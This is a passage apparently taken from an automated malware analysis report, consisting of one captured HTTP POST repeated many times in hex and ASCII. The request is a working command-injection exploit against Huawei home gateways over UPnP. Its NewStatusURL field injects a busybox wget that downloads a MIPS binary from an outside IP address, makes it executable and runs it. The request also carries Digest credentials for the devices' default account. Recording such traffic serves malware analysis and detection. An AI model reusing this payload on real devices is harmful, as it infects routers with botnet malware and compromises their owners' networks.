2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 